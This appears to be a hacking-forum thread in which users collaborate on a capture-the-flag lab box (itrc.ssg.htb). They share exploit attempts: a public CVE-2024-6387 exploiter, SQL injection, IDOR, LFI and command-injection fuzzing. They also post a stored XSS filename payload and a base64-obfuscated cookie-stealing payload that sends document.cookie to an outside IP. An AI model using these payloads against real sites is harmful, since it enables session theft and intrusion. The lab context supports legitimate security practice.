[yolocalman]

The sql error comes from a insert or update query

[UnkownWombat]

I'm trying https://github.com/adriyansyah-mf/CVE-20...-Exploiter
it says it's vulnerable on port 2222
But can't get shell.

i sorta think straight to root is unrealistic anyway, tried it with what should have been a /bin/bash shell

[peRd1]

I'm trying https://github.com/adriyansyah-mf/CVE-20...-Exploiter
it says it's vulnerable on port 2222
But can't get shell.

Yeah, but that one is tricky to exploit, it needs like 10000 attempts for the racing condition to succeed to fire up a shell.
"Exploiting CVE-2024–6387 requires an attacker to initiate thousands of connection attempts to trigger the race condition accurately."  ( https://www.trendmicro.com/en_us/researc...-6409.html )

So that for sure isn't the path.

[Anaunimans]

We have what appears to be a user called zzinter

Btw /api/create_comment.php has a sql injection i think in the id parameter but for some reason i can exploit it.

SQLmap didnt work

[bfusern]

We can acces an "admin" page on http://itrc.ssg.htb/?page=admin

[Anaunimans]

Idor in creating comments.
idor in deleting files ,
stored XSS in file name
try <svg onload=alert()>.zip

Content-Disposition: form-data; name="attachment"; filename="<svg onload=alert()>.zip"
Content-Type: application/zip

xss works
i taught there's might be someone checking loading ticket 1-5 but no results.
i tried stealing cookie
<svg onload=eval(atob('dmFyIGk9bmV3IEltYWdlKCk7IGkuc3JjPSJodHRwOi8vMTAuMTAuMTYuNDIvP2Nvb2tpZT0iK2J0b2EoZG9jdW1lbnQuY29va2llKQo='))>.zip
didnt work.

[metermike1338]

I think about a few possible vectors.

1. The api call for the buttons is "mode":"ping" "host":"<input>" and "mode":"userprov" "user":"<input>". Maybe we can fuzz for more commands. I tried "mode":"provisionSSH" "user":"<me>" with no luck. Also command injection does not work for me.

2. You are able to upload zip files to tickets that dont belong to you by changing the id parameter. Maybe there is a simulated user unzipping the files, if you post them to another ticket.

3. If you click on provision AD user, it stated that a ticket for the ad team was created. Maybe its a blind xxs vector?

What so you think?

[nomx1337]

LFI but with .php restriction:
http://itrc.ssg.htb/?page=/var/www/itrc/api/admin

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[jsvensson]

I think about a few possible vectors.

1. The api call for the buttons is "mode":"ping" "host":"<input>" and "mode":"userprov" "user":"<input>". Maybe we can fuzz for more commands. I tried "mode":"provisionSSH" "user":"<me>" with no luck. Also command injection does not work for me.

2. You are able to upload zip files to tickets that dont belong to you by changing the id parameter. Maybe there is a simulated user unzipping the files, if you post them to another ticket.

3. If you click on provision AD user, it stated that a ticket for the ad team was created. Maybe its a blind xxs vector?

What so you think?

"mode":"userprov","host":"ip" also works, i tried with my ip but didn't get any connection back as for ping there is icmp connection, i think this could be important:
Unavailable. Contact zzinter for manual provisioning.

[osamy7593]

anyone tried zzinter bruteforce on password ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed